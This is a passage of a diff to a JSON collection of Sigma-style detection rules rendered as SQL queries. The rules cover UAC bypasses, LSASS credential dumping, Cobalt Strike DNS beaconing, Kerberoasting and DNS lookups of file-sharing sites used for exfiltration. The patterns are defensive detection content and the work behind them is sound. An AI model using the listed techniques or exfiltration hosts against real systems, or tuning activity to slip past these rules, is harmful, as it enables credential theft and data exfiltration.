'%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE 